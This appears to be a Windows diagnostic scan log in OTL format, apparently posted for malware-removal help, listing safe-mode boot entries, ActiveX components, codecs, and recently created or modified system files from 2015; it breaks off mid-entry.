SafeBootNet:[b]64bit:[/b] {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices SafeBootNet:[b]64bit:[/b] {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices SafeBootNet: Base - Driver Group SafeBootNet: Boot Bus Extender - Driver Group SafeBootNet: Boot file system - Driver Group SafeBootNet: File system - Driver Group SafeBootNet: Filter - Driver Group SafeBootNet: HelpSvc - Service SafeBootNet: Messenger - Service SafeBootNet: NDIS Wrapper - Driver Group SafeBootNet: NetBIOSGroup - Driver Group SafeBootNet: NetDDEGroup - Driver Group SafeBootNet: Network - Driver Group SafeBootNet: NetworkProvider - Driver Group SafeBootNet: PCI Configuration - Driver Group SafeBootNet: PNP Filter - Driver Group SafeBootNet: PNP_TDI - Driver Group SafeBootNet: Primary disk - Driver Group SafeBootNet: rdsessmgr - Service SafeBootNet: sacsvr - Service SafeBootNet: SCSI Class - Driver Group SafeBootNet: Streams Drivers - Driver Group SafeBootNet: System Bus Extender - Driver Group SafeBootNet: TDI - Driver Group SafeBootNet: vmms - Service SafeBootNet: WudfUsbccidDriver - Driver SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootNet: {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readers SafeBootNet: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy SafeBootNet: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices SafeBootNet: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices SafeBootNet: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices ActiveX:[b]64bit:[/b] {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0 ActiveX:[b]64bit:[/b] {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll ActiveX:[b]64bit:[/b] {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack ActiveX:[b]64bit:[/b] {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE ActiveX:[b]64bit:[/b] {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx ActiveX:[b]64bit:[/b] {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help ActiveX:[b]64bit:[/b] {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6 ActiveX:[b]64bit:[/b] {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools ActiveX:[b]64bit:[/b] {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements ActiveX:[b]64bit:[/b] {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player ActiveX:[b]64bit:[/b] {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access ActiveX:[b]64bit:[/b] {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7 ActiveX:[b]64bit:[/b] {7DEBE4EB-6B40-3766-BB35-5CBBC385DA37} - .NET Framework ActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll ActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\System32\ie4uinit.exe -UserConfig ActiveX:[b]64bit:[/b] {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install ActiveX:[b]64bit:[/b] {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding ActiveX:[b]64bit:[/b] {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts ActiveX:[b]64bit:[/b] {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help ActiveX:[b]64bit:[/b] {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface ActiveX:[b]64bit:[/b] {FEBEF00C-046D-438D-8A88-BF94A6C9E703} - .NET Framework ActiveX:[b]64bit:[/b] >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0 ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles(x86)%\Windows Mail\WinMail.exe" OCInstallUserConfigOE ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6 ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7 ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework ActiveX: {7DEBE4EB-6B40-3766-BB35-5CBBC385DA37} - .NET Framework ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding ActiveX: {9793EDE2-499E-4A14-8220-523691D8F91B} - .NET Framework ActiveX: {C6BAF60B-6E91-453F-BFF9-D3789CFEFCDD} - .NET Framework ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help ActiveX: {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - Reg Error: Value error. ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP Drivers32:[b]64bit:[/b] msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS) Drivers32: msacm.ac3acm - C:\Windows\SysWow64\ac3acm.acm (fccHandler) Drivers32: msacm.l3acm - C:\Windows\SysWow64\l3codecp.acm (Fraunhofer Institut Integrierte Schaltungen IIS) Drivers32: vidc.cvid - C:\Windows\SysWow64\iccvid.dll (Radius Inc.) Drivers32: VIDC.FFDS - C:\Windows\SysWow64\ff_vfw.dll () Drivers32: VIDC.XVID - C:\Windows\SysWow64\xvidvfw.dll () PhysicalDisk0 MBR saved to C:\PhysicalMBR.bin [color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color] [2015/03/25 16:44:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox [2015/03/15 23:32:57 | 000,000,000 | ---D | C] -- C:\Users\hp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Algobox [2015/03/15 23:32:57 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Algobox [2015/03/15 23:32:55 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Algobox [2015/03/11 19:39:53 | 000,372,224 | ---- | C] (Adobe Systems Incorporated) -- C:\Windows\SysNative\atmfd.dll [2015/03/11 19:39:53 | 000,299,008 | ---- | C] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\atmfd.dll [2015/03/11 19:39:53 | 000,100,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\fontsub.dll [2015/03/11 19:39:53 | 000,070,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\fontsub.dll [2015/03/11 19:39:53 | 000,046,080 | ---- | C] (Adobe Systems) -- C:\Windows\SysNative\atmlib.dll [2015/03/11 19:39:53 | 000,041,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\lpk.dll [2015/03/11 19:39:53 | 000,034,304 | ---- | C] (Adobe Systems) -- C:\Windows\SysWow64\atmlib.dll [2015/03/11 19:39:53 | 000,014,336 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dciman32.dll [2015/03/11 19:39:46 | 001,202,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drmv2clt.dll [2015/03/11 19:39:46 | 000,842,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\blackbox.dll [2015/03/11 19:39:46 | 000,744,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\blackbox.dll [2015/03/11 19:39:45 | 000,988,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\drmv2clt.dll [2015/03/11 19:39:43 | 014,632,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmp.dll [2015/03/11 19:39:41 | 005,554,104 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe [2015/03/11 19:39:41 | 004,121,600 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mf.dll [2015/03/11 19:39:41 | 003,209,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mf.dll [2015/03/11 19:39:41 | 000,782,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmdrmsdk.dll [2015/03/11 19:39:41 | 000,617,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmdrmsdk.dll [2015/03/11 19:39:40 | 011,411,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmp.dll [2015/03/11 19:39:39 | 001,480,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\crypt32.dll [2015/03/11 19:39:39 | 000,497,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drmmgrtn.dll [2015/03/11 19:39:39 | 000,406,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\drmmgrtn.dll [2015/03/11 19:39:38 | 003,973,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe [2015/03/11 19:39:38 | 001,574,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\quartz.dll [2015/03/11 19:39:38 | 000,631,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\evr.dll [2015/03/11 19:39:38 | 000,229,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wintrust.dll [2015/03/11 19:39:37 | 003,917,760 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe [2015/03/11 19:39:37 | 001,329,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\quartz.dll [2015/03/11 19:39:37 | 001,069,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cryptui.dll [2015/03/11 19:39:37 | 000,616,360 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winresume.efi [2015/03/11 19:39:37 | 000,489,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\evr.dll [2015/03/11 19:39:37 | 000,432,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfplat.dll [2015/03/11 19:39:37 | 000,371,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\qdvd.dll [2015/03/11 19:39:36 | 001,005,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\cryptui.dll [2015/03/11 19:39:36 | 000,641,024 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msscp.dll [2015/03/11 19:39:36 | 000,532,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winresume.exe [2015/03/11 19:39:36 | 000,519,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\qdvd.dll [2015/03/11 19:39:36 | 000,354,816 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfplat.dll [2015/03/11 19:39:36 | 000,082,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cryptsp.dll [2015/03/11 19:39:35 | 000,693,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winload.efi [2015/03/11 19:39:35 | 000,619,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winload.exe [2015/03/11 19:39:35 | 000,325,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msnetobj.dll [2015/03/11 19:39:34 | 000,504,320 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msscp.dll [2015/03/11 19:39:34 | 000,503,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srcore.dll [2015/03/11 19:39:34 | 000,457,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ci.dll [2015/03/11 19:39:34 | 000,296,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rstrui.exe [2015/03/11 19:39:34 | 000,140,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cryptnet.dll [2015/03/11 19:39:33 | 000,500,224 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\AUDIOKSE.dll [2015/03/11 19:39:33 | 000,296,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\AudioSes.dll [2015/03/11 19:39:33 | 000,265,216 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msnetobj.dll [2015/03/11 19:39:33 | 000,126,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\audiodg.exe [2015/03/11 19:39:32 | 000,055,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rrinstaller.exe [2015/03/11 19:39:31 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\rrinstaller.exe [2015/03/11 19:39:30 | 000,206,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfps.dll [2015/03/11 19:39:30 | 000,103,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfps.dll [2015/03/11 19:39:29 | 000,440,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\AudioEng.dll [2015/03/11 19:39:29 | 000,037,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\pcadm.dll [2015/03/11 19:39:28 | 000,442,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\AUDIOKSE.dll [2015/03/11 19:39:28 | 000,146,944 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\appidpolicyconverter.exe [2015/03/11 19:39:27 | 000,024,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfpmp.exe [2015/03/11 19:39:26 | 000,112,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\smss.exe [2015/03/11 19:39:26 | 000,023,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfpmp.exe [2015/03/11 19:39:25 | 000,284,672 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\EncDump.dll [2015/03/11 19:39:25 | 000,063,488 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\setbcdlocale.dll [2015/03/11 19:39:25 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\appidapi.dll [2015/03/11 19:39:25 | 000,050,688 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\appidapi.dll [2015/03/11 19:39:25 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srclient.dll [2015/03/11 19:39:25 | 000,043,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\csrsrv.dll [2015/03/11 19:39:25 | 000,017,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\appidcertstorecheck.exe [2015/03/11 19:39:25 | 000,011,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\pcawrk.exe [2015/03/11 19:39:25 | 000,011,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msmmsp.dll [2015/03/11 19:39:25 | 000,009,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\pcalua.exe [2015/03/11 19:39:24 | 000,009,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\spwmp.dll [2015/03/11 19:39:23 | 012,625,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmploc.DLL [2015/03/11 19:39:23 | 012,625,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmploc.DLL [2015/03/11 19:39:23 | 000,008,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\pcaevts.dll [2015/03/11 19:39:23 | 000,008,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\spwmp.dll [2015/03/11 19:39:23 | 000,006,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\apisetschema.dll [2015/03/11 19:39:23 | 000,006,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\apisetschema.dll [2015/03/11 19:39:23 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msdxm.ocx [2015/03/11 19:39:23 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxmasf.dll [2015/03/11 19:39:23 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msdxm.ocx [2015/03/11 19:39:23 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dxmasf.dll [2015/03/11 19:39:23 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mferror.dll [2015/03/11 19:39:23 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mferror.dll [2015/03/11 19:39:07 | 003,179,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rdpcorets.dll [2015/03/11 19:39:07 | 000,243,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rdpudd.dll [2015/03/11 19:39:07 | 000,016,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\RdpGroupPolicyExtension.dll [2015/03/11 19:38:53 | 000,215,552 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ubpm.dll [2015/03/11 19:38:52 | 000,171,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ubpm.dll [2015/03/11 19:38:46 | 001,461,760 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\lsasrv.dll [2015/03/11 19:38:46 | 000,309,760 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ncrypt.dll [2015/03/11 19:38:46 | 000,136,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspicli.dll [2015/03/11 19:38:46 | 000,064,000 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\auditpol.exe [2015/03/11 19:38:45 | 000,686,080 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\adtschema.dll [2015/03/11 19:38:45 | 000,686,080 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\adtschema.dll [2015/03/11 19:38:45 | 000,146,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msaudite.dll [2015/03/11 19:38:45 | 000,146,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msaudite.dll [2015/03/11 19:38:45 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\auditpol.exe [2015/03/11 19:38:45 | 000,029,184 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspisrv.dll [2015/03/11 19:38:45 | 000,028,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\secur32.dll [2015/03/11 19:38:44 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msobjs.dll [2015/03/11 19:38:44 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msobjs.dll [2015/03/11 19:38:10 | 001,067,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msctf.dll [2015/03/11 19:38:09 | 001,424,896 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WindowsCodecs.dll [2015/03/11 19:38:06 | 000,114,688 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollector.exe [2015/03/11 19:38:06 | 000,076,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll [2015/03/11 19:38:06 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwproxystub.dll [2015/03/11 19:38:06 | 000,047,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll [2015/03/11 19:38:06 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll [2015/03/11 19:38:05 | 000,718,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe [2015/03/11 19:38:05 | 000,077,824 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\JavaScriptCollectionAgent.dll [2015/03/11 19:38:05 | 000,064,000 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll [2015/03/11 19:38:05 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll [2015/03/11 19:38:05 | 000,034,304 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll [2015/03/11 19:38:03 | 002,052,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl [2015/03/11 19:38:03 | 000,968,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MsSpellCheckingFacility.exe [2015/03/11 19:38:03 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll [2015/03/11 19:38:03 | 000,620,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll [2015/03/11 19:38:03 | 000,115,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe [2015/03/11 19:38:03 | 000,062,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll [2015/03/11 19:38:03 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollectorres.dll [2015/03/11 19:38:02 | 000,801,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll [2015/03/11 19:38:02 | 000,800,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dll [2015/03/11 19:38:02 | 000,478,208 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll [2015/03/11 19:38:02 | 000,316,928 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtrans.dll [2015/03/11 19:38:02 | 000,066,560 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll [2015/03/11 19:38:01 | 002,125,824 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl [2015/03/11 19:38:01 | 001,155,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll [2015/03/11 19:38:00 | 000,168,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll [2015/03/11 19:38:00 | 000,144,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe [2015/03/11 19:37:59 | 000,633,856 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieui.dll [2015/03/11 19:37:59 | 000,490,496 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtmsft.dll [2015/03/11 19:37:58 | 006,035,456 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll [2015/03/11 19:37:58 | 001,359,360 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmlmedia.dll [2015/03/11 19:37:58 | 000,814,080 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9diag.dll [2015/03/11 19:37:58 | 000,584,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\vbscript.dll [2015/03/11 19:37:58 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll [2015/03/11 19:37:57 | 000,199,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msrating.dll [2015/03/11 19:37:57 | 000,088,064 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MshtmlDac.dll [2015/03/11 19:36:13 | 000,465,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WMPhoto.dll [2015/03/11 19:36:13 | 000,417,792 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\WMPhoto.dll [2015/03/08 15:53:15 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yahoo! Messenger [color=#E56717]========== Files - Modified Within 30 Days ==========[/color] [2015/04/06 18:11:51 | 000,000,512 | ---- | M] () -- C:\PhysicalMBR.bin [2015/04/06 18:01:00 | 000,001,070 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job [2015/04/06 18:01:00 | 000,001,002 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job [2015/04/06 17:51:00 | 000,001,066 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-3588181205-1423536317-4130440005-1000UA.job [2015/04/06 16:09:05 | 000,001,014 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-3588181205-1423536317-4130440005-1000Core.job [2015/04/06 15:56:35 | 000,000,540 | ---- | M] () -- C:\Windows\tasks\MATLAB R2014b Startup Accelerator.job [2015/04/06 15:54:07 | 000,000,916 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-3588181205-1423536317-4130440005-1000UA.job [2015/04/06 15:54:02 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat [2015/04/06 00:48:00 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-3588181205-1423536317-4130440005-1000Core.job [2015/04/05 23:01:00 | 000,001,066 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job [2015/04/05 21:54:26 | 000,026,576 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 [2015/04/05 21:54:26 | 000,026,576 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 [2015/04/05 21:51:13 | 002,229,580 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI [2015/04/05 21:51:13 | 000,747,154 | ---- | M] () -- C:\Windows\SysNative\perfh00C.dat [2015/04/05 21:51:13 | 000,653,724 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat [2015/04/05 21:51:13 | 000,470,402 | ---- | M] () -- C:\Windows\SysNative\perfh001.dat [2015/04/05 21:51:13 | 000,149,646 | ---- | M] () -- C:\Windows\SysNative\perfc00C.dat [2015/04/05 21:51:13 | 000,121,596 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat [2015/04/05 21:51:13 | 000,094,224 | ---- | M] () -- C:\Windows\SysNative\perfc001.dat [2015/04/05 21:47:06 | 000,000,352 | ---- | M] () -- C:\Windows\tasks\DriverToolkit Autorun.job [2015/04/05 21:47:06 | 000,000,320 | ---- | M] 